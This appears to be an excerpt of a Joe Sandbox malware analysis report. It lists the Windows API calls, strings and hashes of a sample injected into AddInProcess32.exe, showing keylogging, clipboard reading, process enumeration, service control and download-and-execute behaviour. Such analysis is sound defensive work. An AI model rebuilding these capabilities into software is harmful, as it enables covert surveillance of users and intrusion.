                                                                                                    • API String ID: 3950776272-0
                                                                                                    • Opcode ID: 97c9471a4feb21372bfec3f691305eac3cca21be586dff8f661e5b3b360a5f75
                                                                                                    • Instruction ID: 59628d97446cb481dba570c2b442d682f024dd9dc2812234181a156a821a4c1f
                                                                                                    • Opcode Fuzzy Hash: 97c9471a4feb21372bfec3f691305eac3cca21be586dff8f661e5b3b360a5f75
                                                                                                    • Instruction Fuzzy Hash: F7619270200211ABD750AF66CD91BAB7BA5BF44714F54412AF9158B382DBFCE8C1CBD9
                                                                                                    APIs
                                                                                                    • GetForegroundWindow.USER32(00472008,?,00472008), ref: 0040949C
                                                                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                                                                                    • GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                                                                                    • GetKeyState.USER32(00000010), ref: 004094B8
                                                                                                    • GetKeyboardState.USER32(?), ref: 004094C5
                                                                                                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                                                                                    • String ID:
                                                                                                    • API String ID: 3566172867-0
                                                                                                    • Opcode ID: b347f1a6ebd5a27a3c62a6440ea9f983a5eff6272c066a99259600f45f129da1
                                                                                                    • Instruction ID: c7d3d650b917c490fc12d3d20248521073b1bf92526e1b13c177c4272b1ff9cc
                                                                                                    • Opcode Fuzzy Hash: b347f1a6ebd5a27a3c62a6440ea9f983a5eff6272c066a99259600f45f129da1
                                                                                                    • Instruction Fuzzy Hash: B9111E7290020CABDB10DBE4EC49FDA7BBCEB4C706F510465FA08E7191E675EA548BA4
                                                                                                    APIs
                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00418656,00000000), ref: 00418A09
                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00418656,00000000), ref: 00418A1E
                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A2B
                                                                                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00418656,00000000), ref: 00418A36
                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A48
                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A4B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                    • String ID:
                                                                                                    • API String ID: 276877138-0
                                                                                                    • Opcode ID: 637da124ebd858597763fdc0195e491a5d188b8048d228e092eb7bdd2ad61358
                                                                                                    • Instruction ID: d7e7041197745ae6b8576ac0eea0d71e7d0897d816d6b6e74118e31fa9ec717f
                                                                                                    • Opcode Fuzzy Hash: 637da124ebd858597763fdc0195e491a5d188b8048d228e092eb7bdd2ad61358
                                                                                                    • Instruction Fuzzy Hash: CAF082711012246FD211EB65EC89DBF2BACDF85BA6B41042BF801931918F78CD49A9B9
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(00000000,?), ref: 00417D01
                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 00417DCD
                                                                                                      • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$Find$CreateFirstNext
                                                                                                    • String ID: H"G$`'G$`'G
                                                                                                    • API String ID: 341183262-2774397156
                                                                                                    • Opcode ID: 491aec702e058cc976c4f8e19fcf1970bdb99c150411e745d642373cd7af4ec7
                                                                                                    • Instruction ID: cc65440c5fe1593426504ff8613f72b7370ef7481f3bf724e026da4e35a467e2
                                                                                                    • Opcode Fuzzy Hash: 491aec702e058cc976c4f8e19fcf1970bdb99c150411e745d642373cd7af4ec7
                                                                                                    • Instruction Fuzzy Hash: 138183315083415BC314FB62C996DEFB7A8AF90304F40493FF586671E2EF789A49C69A
                                                                                                    APIs
                                                                                                      • Part of subcall function 00415C90: GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                                                                                                      • Part of subcall function 00415C90: OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                                                                                                      • Part of subcall function 00415C90: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                                                                                                      • Part of subcall function 00415C90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                                                                                                      • Part of subcall function 00415C90: GetLastError.KERNEL32 ref: 00415CDB
                                                                                                    • ExitWindowsEx.USER32(00000000,00000001), ref: 00414E56
                                                                                                    • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00414E6B
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00414E72
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                    • String ID: PowrProf.dll$SetSuspendState
                                                                                                    • API String ID: 1589313981-1420736420
                                                                                                    • Opcode ID: bb589c4a9e5ce4fb7329190ff839279ce61210147b3cfe0a03d1c41bdf58f902
                                                                                                    • Instruction ID: 748c18e79ee5f9a1fbb6f05bd7ad52209f91b0004c4d1b0055552a3b76c5c1f9
                                                                                                    • Opcode Fuzzy Hash: bb589c4a9e5ce4fb7329190ff839279ce61210147b3cfe0a03d1c41bdf58f902
                                                                                                    • Instruction Fuzzy Hash: 5F214F7070430157CE14FBB19896AAF6359AFD4349F40097FB5026B2D2EE7DCC4986AE
                                                                                                    APIs
                                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6B5
                                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6DE
                                                                                                    • GetACP.KERNEL32(?,?,0044F93B,?,00000000), ref: 0044F6F3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID: ACP$OCP
                                                                                                    • API String ID: 2299586839-711371036
                                                                                                    • Opcode ID: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                                                                                                    • Instruction ID: bf1e89585aec8fc6a823a5c6a63220f2d7696aba51182a9853130589b0d37fa4
                                                                                                    • Opcode Fuzzy Hash: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                                                                                                    • Instruction Fuzzy Hash: 2221C122A00101A6F7348F24C901A9B73AAAF50B65F578577E809C7221FB36DD4BC398
                                                                                                    APIs
                                                                                                    • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 004194A4
                                                                                                    • LoadResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194B8
                                                                                                    • LockResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194BF
                                                                                                    • SizeofResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194CE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                    • String ID: SETTINGS
                                                                                                    • API String ID: 3473537107-594951305
                                                                                                    • Opcode ID: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                                                                                                    • Instruction ID: a9e8191b24fee58836060ebd07e0bd7776b83e69f4e337d8cda710b4f32c44fb
                                                                                                    • Opcode Fuzzy Hash: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                                                                                                    • Instruction Fuzzy Hash: 72E01A76200710ABCB211FA1FC5CD273E69F799B537050035FA0183222DA75CC00CA19
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 004087A5
                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040881D
                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00408846
                                                                                                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040885D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Find$File$CloseFirstH_prologNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 1157919129-0
                                                                                                    • Opcode ID: bee7f5f2dbd26623ceae785115fe4ed72eb4a605c9ebee09c1c08c84f1d66a56
                                                                                                    • Instruction ID: 37d480644902bd8bd77a9749fd647df5a3db5b19bbca398f696489d34b7b99bb
                                                                                                    • Opcode Fuzzy Hash: bee7f5f2dbd26623ceae785115fe4ed72eb4a605c9ebee09c1c08c84f1d66a56
                                                                                                    • Instruction Fuzzy Hash: 12814D329001199BCB15EBA1DD929ED73B8AF54308F10427FE446B71E2EF385B49CB98
                                                                                                    APIs
                                                                                                      • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                                      • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                                      • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                                      • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                                      • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                                                                                      • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791
                                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044F8FC
                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 0044F957
                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0044F966
                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,00441F7E,00000040,?,0044209E,00000055,00000000,?,?,00000055,00000000), ref: 0044F9AE
                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00441FFE,00000040), ref: 0044F9CD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                    • String ID:
                                                                                                    • API String ID: 745075371-0
                                                                                                    • Opcode ID: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                                                                                                    • Instruction ID: 3a6be996f1d9ea25600d7609fa1d0555167a50dcc121ad64ff78238f3932635f
                                                                                                    • Opcode Fuzzy Hash: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                                                                                                    • Instruction Fuzzy Hash: 0351A271900215AFFB20EFA5DC41BBF77B8AF08301F05447BE914EB251E7789A088769
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0040784D
                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407906
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040792E
                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040793B
                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407A51
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1771804793-0
                                                                                                    • Opcode ID: e4819ccc166c9f01838b68987bff0171c3af6b43d70e485e5f2840cc2cf561bf
                                                                                                    • Instruction ID: 4b9324871479917b5af30c26e04a30266e6971a3e86a210f007197118c0b57fe
                                                                                                    • Opcode Fuzzy Hash: e4819ccc166c9f01838b68987bff0171c3af6b43d70e485e5f2840cc2cf561bf
                                                                                                    • Instruction Fuzzy Hash: 18516372904208AACB04FBA1DD969DD7778AF11308F50417FB846771E2EF389B49CB99
                                                                                                    APIs
                                                                                                      • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E305
                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040E329
                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E338
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E4EF
                                                                                                      • Part of subcall function 00419F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040DFB9,00000000,?,?,00000001), ref: 00419F66
                                                                                                      • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E4E0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                    • String ID:
                                                                                                    • API String ID: 1735047541-0
                                                                                                    • Opcode ID: 322a21650b7cdb691a380e1f32b584157382834de1627d8e80e9ce1f3e3b7542
                                                                                                    • Instruction ID: 9ef93eb2fb75da2762b4731e21c5b8dc01158be40bd3d18dbb98703d8f1b3e60
                                                                                                    • Opcode Fuzzy Hash: 322a21650b7cdb691a380e1f32b584157382834de1627d8e80e9ce1f3e3b7542
                                                                                                    • Instruction Fuzzy Hash: 904101311082415BC365F761D991EEFB3A8AFD4344F50493EF48A921E2EF38994AC75A
                                                                                                    APIs
                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004064D2
                                                                                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004065B6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DownloadExecuteFileShell
                                                                                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$open
                                                                                                    • API String ID: 2825088817-2881483049
                                                                                                    • Opcode ID: 9af02d018f3fd44a8981843ad1b73823c729f3db09203ba27b131e3d49614b30
                                                                                                    • Instruction ID: de45ecf938be0b84f02b1b366aeabb591a3e89dbb22835c7232af05a142efef6
                                                                                                    • Opcode Fuzzy Hash: 9af02d018f3fd44a8981843ad1b73823c729f3db09203ba27b131e3d49614b30
                                                                                                    • Instruction Fuzzy Hash: 6F61D331A0430167CA14FB75D8A697E77A99F81708F00093FFD42772D6EE3D8A09869B
                                                                                                    APIs
                                                                                                    • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041A861
                                                                                                      • Part of subcall function 0041215F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041216E
                                                                                                      • Part of subcall function 0041215F: RegSetValueExA.KERNELBASE(?,00464150,00000000,?,00000000,00000000,00472200,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 00412196
                                                                                                      • Part of subcall function 0041215F: RegCloseKey.KERNELBASE(?,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 004121A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateInfoParametersSystemValue
                                                                                                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                    • API String ID: 4127273184-3576401099
                                                                                                    • Opcode ID: b2b5532adfee4e4b900b4fad0ed9cd8c83e1a92fc8b848bb2064ac0ba1e99bb2
                                                                                                    • Instruction ID: 146807b905f8226e4159dba151db05d0611ea4827dca33b530162433be1e3f9d
                                                                                                    • Opcode Fuzzy Hash: b2b5532adfee4e4b900b4fad0ed9cd8c83e1a92fc8b848bb2064ac0ba1e99bb2
                                                                                                    • Instruction Fuzzy Hash: 7C119671F8024037D514353A4D6BBAE18199343B50F54016BB6022B6CAF8EE4EA553DF
                                                                                                    APIs
                                                                                                      • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                                      • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                                      • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                                      • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00441F85,?,?,?,?,004419DC,?,00000004), ref: 0044EF9A
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0044F02A
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0044F038
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00441F85,00000000,004420A5), ref: 0044F0DB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 4212172061-0
                                                                                                    • Opcode ID: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
                                                                                                    • Instruction ID: 651119c321e801f17dd1a7ba429a2dceeb4aa1bed9d5f8a21b6634afb1069130
                                                                                                    • Opcode Fuzzy Hash: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
                                                                                                    • Instruction Fuzzy Hash: 8E61E935600606AAFB24AB36DC46BB773A8FF44714F14047FF905D7282EB78E9488769
                                                                                                    APIs
                                                                                                      • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                                      • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                                      • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                                      • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                                      • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                                                                                      • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F2F7
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F348
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F408
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                    • String ID:
                                                                                                    • API String ID: 2829624132-0
                                                                                                    • Opcode ID: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
                                                                                                    • Instruction ID: 12c224c4da0c85949021a4ccaa6d586ab513ef91610cb16151a2099a543b2454
                                                                                                    • Opcode Fuzzy Hash: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
                                                                                                    • Instruction Fuzzy Hash: 49617D71600207ABEB289F25CC82B7B77A8EF14314F1041BBED06C6685EB78D949DB58
                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 004399A4
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004399AE
                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 004399BB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                    • String ID:
                                                                                                    • API String ID: 3906539128-0
                                                                                                    • Opcode ID: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                                                                                                    • Instruction ID: 77e6618fa9d19f9c50586940e2a7469f5a9d54f298177c93e0bbf68cc30459b4
                                                                                                    • Opcode Fuzzy Hash: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                                                                                                    • Instruction Fuzzy Hash: 1D31D67591122C9BCB21DF65D9897CDB7B8BF08310F5051EAE40CA72A1E7749F858F48
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(?,?,0044078B,?), ref: 004407D6
                                                                                                    • TerminateProcess.KERNEL32(00000000,?,0044078B,?), ref: 004407DD
                                                                                                    • ExitProcess.KERNEL32 ref: 004407EF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    • Opcode ID: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                                                                                                    • Instruction ID: 8c86c1f28e0fd2f6406888839527a8aea1509f7e03a0ffdd8510570f14deced8
                                                                                                    • Opcode Fuzzy Hash: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                                                                                                    • Instruction Fuzzy Hash: 9AE04631000608ABEF017F20DD48A493B29EB40346F410029F9088B232CB3DED52CA89
                                                                                                    APIs
                                                                                                    • OpenClipboard.USER32(00000000), ref: 0040A65D
                                                                                                    • GetClipboardData.USER32(0000000D), ref: 0040A669
                                                                                                    • CloseClipboard.USER32 ref: 0040A671
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$CloseDataOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2058664381-0
                                                                                                    • Opcode ID: fc42fbe939e34f95e3da0c1deb258c5860a889e64c116dd0334dc6fce6b72752
                                                                                                    • Instruction ID: 184f8b84181a4a50bd43ef3289a1c1a9f5b779335cc527adffbe090e77bee848
                                                                                                    • Opcode Fuzzy Hash: fc42fbe939e34f95e3da0c1deb258c5860a889e64c116dd0334dc6fce6b72752
                                                                                                    • Instruction Fuzzy Hash: 6CE08C3064432097D2206F60EC08B8A66649B50B12F064A7AB849AB2D1DA75DC208AAE
                                                                                                    APIs
                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 004329F3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                    • String ID: P@
                                                                                                    • API String ID: 2325560087-676759640
                                                                                                    • Opcode ID: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                                                                                                    • Instruction ID: 4a1c44cf8a386737ece403ae0cfd22a47b20ce31fd9c2d8f3958115f99bf9d9d
                                                                                                    • Opcode Fuzzy Hash: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                                                                                                    • Instruction Fuzzy Hash: E4514A719002099BDB24CFAAD98579ABBF4FF48314F14846BD815EB350E3B9A910CFA5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: .
                                                                                                    • API String ID: 0-248832578
                                                                                                    • Opcode ID: 0742d3138d3954d6b0adc7bce21f8647b4e5777487e1ab8e88fa8e0c5db588f4
                                                                                                    • Instruction ID: 24926096c943187a016d953fe808ce2acf1242cb654f72e39a34338bfc4b4f1c
                                                                                                    • Opcode Fuzzy Hash: 0742d3138d3954d6b0adc7bce21f8647b4e5777487e1ab8e88fa8e0c5db588f4
                                                                                                    • Instruction Fuzzy Hash: 0E3108719002486FEB248E79CC84EEB7BBDDB45304F14419EF858D7251EB34EE418B94
                                                                                                    APIs
